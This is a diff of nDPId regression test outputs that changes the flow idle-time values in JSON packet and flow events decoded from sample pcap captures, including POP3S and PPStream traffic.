+00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-data-len":2704,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938117559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 diff --git a/test/results/pps.pcap.out b/test/results/pps.pcap.out index 895ca0fb8..4cd647cb0 100644 --- a/test/results/pps.pcap.out +++ b/test/results/pps.pcap.out 
@@ -33,12 +33,12 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1467353136483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1467353136483,"pkt":"TF4M6gNlABxCjnAxCABFAABHf1sAAIARGYnAqHMIt+S2LFkJNlkAMzZRK4B+aGhJxenIZriZ1dfXqamg+fjwxMU1UFBQXFw8PHdzc3Nzc\/PMztbWAA=="} 01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1467353136492,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1107,"pkt_l4_len":1073,"thread_ts_msec":1467353136492,"pkt":"ABxCjnAxTF4M6gNlCABFKARFCXUAAGcRqYjexYoMwKhzCBssWQkEMdp11oSDpaWH1\/\/FAmSDtbWx8PLexT66472RkJCQkDRPT09PT09PS5jNKDDUtGPhLFjohGWYT2j8j83amDkrhZ3C\/2FQ5mdZnyaSlXvpTSw4QxzPKc\/1ppy0r1eRZI5oJ+p2dayL0dtYIRXg5e6MWgrC2be0L7w5uHO8F004aYCv4P9CJMUAHJpWAbSrTZTMfEtWFyfDkj7YkHwaP5UymM6nR48L2gXFeKkUsAfFE4YdqOFx0jp7Or60QKwF28+F5JlmKheAIJYQf2G3TqQY5Z0GTRcqhNLIOvYwJHCg1nj9RsIaYrnxmJ6DxwmjdzptTsT9sVdTMbkTg\/n2nGJhiOefKm8zFCoYHgU+C28Gf5sas1vu\/kt+OthMjccEo9wtGlC0ASPJ0qzS1sLHzYCsHMKDTYi9DD4foBrLZIc7pPx6JY6jOITQrc3efMsbAqZ1ZQQ9kAdp5K3mgsg3YJ0Q8Y0QZBWPHmxflGMFEMjHsP3GqPpnIAikccEmWg4o7+4F7KjVV7AVvTEyzA+8jQ1VrBrX5u+RVR9KG1O2SE5Cyq01BIwBHkezcDDf26H5C97IBIVRHEUN9a1I634tVX2hvonn9B8R7ucHFtbPm8v8XEfv5vsQiUBxdkQr4DEWqI+9efmJ7QzhmvbgsfQT\/lgyVKjuV7xATyGBulDT7mIFhQJis3fW7N6AP3W7D2NaqruF2RCWxjuAfiDF7FqVCRQStQiec12qDWggWFa5YJPYeAg3DNJYZLcxFww8J70\/Eg39+xjHkW\/GOLYez3x9FJNy88bzEiJFYwCTWUZnK3jDBLUaCFieNDFzqoKVzt+\/kSz+C3mshabnALJ2aYVnyWRkGVGRIw3S0WoTq9YykqwMV24Kk34rk9VX0xjIdoKqUAQsTP2sFY10R\/tU6R54Bq6N20vbHw0423rQBfXYTLF76muZ+5yrUbSgYHUxbnjBnVjpbbDNFDv1NDIURH8hFLeWNAsNZtLNHUp97veG5JCgSoBcNWrf5g+qs\/mmuRkZFHQLGQXlFjnHqt7DW788
8AHgw3u4CiGUSrJzphDpfCWP0RgDn299d2Ril0LC8MhkTRLsCefsDfyp9t55XHR0+9rQ12xOawr2Gfk1nM+UlkyzEfd1uzpXju7BlNw\/XaM1RcvL26zFCGpLkhelssxeXpe1oStGT9+fgo5vRALSMf096AIfzKDk\/NbnZpnXY4r7ISHMeE5wJVp6Hs0TJswp0xbpQzaMzYGEvxoAbPu5kOZ9OipaPQfGALzzv2q6QmKKpdI3AnIh4LIO1vipAjAuDPqLWlCAnhJDj80pV4njf5FGejVXyupeYtcRvfudhBQ8G2H+16vYuNtcP3OV14wpgh5uQQEZwbFNlX+Dnyt\/qoHM45o25wYs9\/IAm40Qt01817PU8SGdpYVifHQAgAAA"} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":259,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136433,"flow_last_seen":1467353136571,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":11464,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1467353136571,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136616,"flow_last_seen":1467353136616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136616,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467353136616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136616,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136617,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136616,"flow_last_seen":1467353136616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136616,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467353136616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136616,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} 
+00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1467353136617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136617,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} 01883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1467353136640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1109,"pkt_l4_len":1075,"thread_ts_msec":1467353136640,"pkt":"ABxCjnAxTF4M6gNlCABFKARHPvMAAGwRBbvKxgdZwKhzCD6nWQkEM7bwtIThx8fltZ2nYAbh19fDgoHFsbOz05H7ys7Ozs7OUjMzMzMzMzM3d32QGgSgl3utg\/Lr9hRf++0ikCQTv4qzjqE0Vwx53Ozi5DZHrUJ0D9ld80WV2ev0tZtZRKXgAoVPxGV\/sVzgH4xC6HL79R7mq5iPtdzW66QMOgYGr3SE8p+G4rKdTYea586Ro7AY6bM28Jh0I5r5TVTI2fUcSzHV34y5S7zxuN9s2gdR+G2nAQ9di580b0fnOVMCMbQS0YymBcyPOk\/TMuDcu3jPoKDTMgO9S0s0IYLNh3NTzcMZuYatUE10g0vqD2WlKxR1edSPZQFM4WX\/I8oWPKSn5CmnWCJgNchgz7RCWXFcarMT+ited1xm8MkWOvZ2PeUCHfQ1MuOuLpD7j5mhw07uokSIlTUFQAnPCELFA5Psd1zbcuid+es8QtEP8h5Pg5ROnoUYgwG\/AmXnw02rh0T218tbI40AgvHe3fXoohnR3eOl8fPl6Tin6Gi3A066NBegsFeRPVSX+gHnt5FK1bZ00Z5WDtXOvCRcLb\/+iWvY\/Ph9J25OZG\/H6f9hZv6bNXwaaIuHTCkt2zE30xNgGrL5fP\/qsPXo4QVw4df\/AHUUWn7DNhotAyglmhZHHHx2D76uvfRLfpDX45nAOTU0aQzIlAkbjeL9MiunISwrfsUiGGi77jizTx7AZjJwIN9X0xB729dePDFW3iOjEJKi6wwqiXtgjp0Qn4ycT8aj3higqkAdmCf6viBeUxA4Ey0XJs8LeWlBWrWLGrAVX\/syUvSc0Qnt7hgTis34opRC9MgH7uPb+CPcACWQ4PyqMfFoB93v48Hj+r9dC9ONTO9C\/ktt3YfWgupPKQW8qdqTDsSYNY4LtVldBymEKQFgcafM+ACwgYLH3rkh38VWSezZwGc\/KyCgGlonrmjhRAudSNJrjk2I5hAwMjl3+Su91K1EqYBwzJUW5Alu89DYvHVV54Y1uiDfno+vg9g2pOTv9qD\/obGNrCOfIKiGoGknOiYUYI9eRr\/Qs1peKBmW\/7D5fFEEUzXzGE\/77OK829Wr420Sgnl\/\/9UHV4dxNEpg7Umuc4f16HFagvn7
eaQRFd2LphIs7VvTz82qi7A\/OZJVG8fQa21CCaNp\/VwpaOYvMyyVi6a19f21I+oFHfTzAOIIV1wwifq0aAqUb5BxGVtvBKoejKKSwLl6F5F2DDKztCmxmzs\/WdQTTScN896khxt4jB6c6Mtj512hCjnKbeZFmlvfg6SdAKpUxQ3Gx6Yz3l9WLMoFQ3S6GdtYorTUz4zvLoxi+9EUFhpvg1ZrQIfeIXH93JJ0H9uwkye148Sa+dodTKDlcRbxOKd9fiM3Owhw5\/cz2k47y3guqZHbBfAcDjAReQ92\/933ihS1JB7je3wazbY+fsqer0ZQzO0QaggAAAA="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136757,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467353136757,"pkt":"TF4M6gNlKDc3Alz6CABFAAA0AHFAAEAGMi3AqAUPROn9hf5lAFBsGPTh5ZgTx4AREAFu8AAAAQEICiYbPvkrIgZe"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136757,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467353136757,"pkt":"TF4M6gNlKDc3Alz6CABFAAA0AHFAAEAGMi3AqAUPROn9hf5lAFBsGPTh5ZgTx4AREAFu8AAAAQEICiYbPvkrIgZe"} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":725,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136440,"flow_last_seen":1467353136804,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":9408,"flow_avg_l4_payload_len":294,"midstream":0,"thread_ts_msec":1467353136804,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1467353136833,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1467353136833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1467353136833,"pkt":"TF4M6gNlABxCjnAxCABFAACIADsAAIARBNXAqHMI2j0nZ1kJRXwAdM6LbABEsXEiUCg6x2bnNgAAAQADAAAAwKhzCAlZCtIsqwEGdAZ0b\/pmQpw8UwQ938xDXiteKyTtmkXcENwQJOknUZ5InkhvdWVRsieyJz3jqlgDTwNPynAfWaJVkHF5+IVd1THVMQGvgGhBFEEU"} 
@@ -121,200 +121,200 @@ 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1467353136838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353136838,"pkt":"TF4M6gNlABxCjnAxCABFAAB0AFUAAIARCQHAqHMId7yFtlkJRXwAYCbMWABVcnEAAAAA4pCy\/AcAAAAAAAAAFAQbslmKl2DoSDdZBZ9sSucAAAAAAAAAAAYIAAANKAICAAAADQAYAMCocwgJWRcAABIKAAAAAAAlAcgIZPMJAAAAAA=="} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1467353136838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353136838,"pkt":"TF4M6gNlABxCjnAxCABFAAB0AFYAAIARp8zAqHMItz2naFkJRXwAYEeGWABVcnEAAAAAyMXU\/wcAAAAAAAAAFADpSP+bPHc9KoW3YGEXtKMAAAAAAAAAAAYIAAANKAIBAAAACAAYAMCocwgJWRcAACUKAAAAAAAlActw35cdAAAAAA=="} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":921,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136439,"flow_last_seen":1467353136900,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":8362,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1467353136900,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\/YT0xJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxMzgmYz1hZTg3Y2IzY2ZkZjQ5NGFhNDhkYzYwODkwOWY2OTI1MCZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTg4NzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTI3NTU4JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPWFlYTU2YTgwOGZjOTJlZjM2MDUxOTEyMTk0OGUwZjI3JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU5MTI0JnZlPTEmdz0yLDMgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRy
b2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFRSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; 
WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"thread_ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\/NTNlMjVlMzNlMDY0YzY1N2MwNmI1NThlNWMzYzMzZmQgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZ